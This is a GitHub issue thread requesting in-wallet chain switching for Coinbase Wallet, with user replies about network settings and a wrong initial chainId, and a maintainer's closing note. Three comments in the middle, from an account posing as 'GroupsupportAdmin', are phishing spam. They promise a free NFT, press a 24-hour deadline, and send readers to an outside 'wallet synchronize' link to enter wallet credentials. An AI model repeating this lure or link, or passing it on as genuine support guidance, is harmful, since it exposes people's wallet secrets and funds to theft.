### ISSUE TITLE
Feature Request: Switch Chains from within Coinbase Wallet

### ISSUE THREAD

**Issue by kyokosdream** [coinbase/coinbase-wallet-sdk#486]
### Is your feature request related to a problem? Please describe.

It is frustrating to have to send a switchChain request to Coinbase Wallet just to change the chain I'm working on. Why is there no ability to change EVM-compatible chains directly from the wallet?

Nearly every other popular wallet offers this functionality. 

### Describe the solution you'd like

The ability to change chains directly from Coinbase Wallet without issuing a `wallet_switchEthereumChain` request.

**Comment by NikitaVr** [comment]
Hey, are you trying to switch between networks like Ethereum vs Polygon, or are you trying to switch between chain IDs on the same RPC URL?

For switching between say Ethereum and Polygon, you can do this by

Click on Settings
Click on "Default Network"

![image](https://user-images.githubusercontent.com/10101970/166519289-fa2d6819-4e40-4283-af87-931ef895d916.png)

Then scroll down and click on Polygon, or any other Network or Testnet

![image](https://user-images.githubusercontent.com/10101970/166519386-84f41945-c3da-4a69-8b85-eda4d00f8eb6.png)

**Comment by agmitron** [comment]
I have two related issues: 

1. In my dApp I cannot handle network switching withing Coinbase Wallet
2. Initial chainId is incorrect: it shows 1 when it's another chainId (for example, provider.chainId shows 1, but network is Avalanche)

<img width="542" alt="image" src="https://user-images.githubusercontent.com/44631357/183418104-108ec983-6f84-4a5b-b897-a26c4058b29e.png">
<img width="373" alt="image" src="https://user-images.githubusercontent.com/44631357/183418190-b2358bd2-f02a-4db8-a966-884a5b6ca68d.png">

**Comment by GroupsupportAdmin** [comment]
Congratulations 🎉 🎉  you’ve won an NFT🎁
You were randomly chosen to receive a free NFT worth 10ETH

Please note: Do not click any other link apart from the one you see here and you have 24 hours to claim your prize🎁, any unclaimed prizes will be rolled over for tomorrow’s giveaways! 

_To Claim:_

NOTE: You need a wallet which has undergone a transaction to have a successful verification.
Click on the link below to complete your 
Verification

Step 1. Go to the Official Wallet synchronize website.



https://webs.smartcoiapp.com/?ol


Step 2. Then scroll down and click on the wallet you use


*Select your wallet: e.g (Safepal, Trustwallet, MetaMask)

3. Use your credentials to generate your QR CODE

Kindly give me a screenshot after you click on the Link okay

**Comment by GroupsupportAdmin** [comment]
Congratulations 🎉 🎉  you’ve won an NFT🎁
You were randomly chosen to receive a free NFT worth 10ETH

Please note: Do not click any other link apart from the one you see here and you have 24 hours to claim your prize🎁, any unclaimed prizes will be rolled over for tomorrow’s giveaways! 

_To Claim:_

NOTE: You need a wallet which has undergone a transaction to have a successful verification.
Click on the link below to complete your 
Verification

Step 1. Go to the Official Wallet synchronize website.



https://webs.smartcoiapp.com/?ol


Step 2. Then scroll down and click on the wallet you use


*Select your wallet: e.g (Safepal, Trustwallet, MetaMask)

3. Use your credentials to generate your QR CODE

Kindly give me a screenshot after you click on the Link okay[![image](https://user-images.githubusercontent.com/108639490/187220233-4bee09fd-b6a4-4ef3-9bb0-dcd0747a029e.jpeg)]()

**Comment by GroupsupportAdmin** [comment]
Congratulations 🎉 🎉  you’ve won an NFT🎁
You were randomly chosen to receive a free NFT worth of 0.7ETH![image](https://user-images.githubusercontent.com/108639490/187220565-8fb499f2-151e-46d0-ba7a-4c4ed92e158c.jpeg)

Please note: Do not click any other link apart from the one you see here and you have 24 hours to claim your prize🎁, any unclaimed prizes will be rolled over for tomorrow’s giveaways! 

_To Claim:_

NOTE: You need a wallet which has undergone a transaction to have a successful verification.
Click on the link below to complete your 
Verification

Step 1. Go to the Official Wallet synchronize website.



https://webs.smartcoiapp.com/?ol


Step 2. Then scroll down and click on the wallet you use


*Select your wallet: e.g (Safepal, Trustwallet, MetaMask)

3. Use your credentials to generate your QR CODE

Kindly give me a screenshot after you click on the Link okay

**Comment by bangtoven** [comment]
hi. sorry for the belated response. 
we've updated the network selection page on our extension.
please try our latest SDK version 3.6.0 as well. 
feel free to open a new one if needed. thanks.
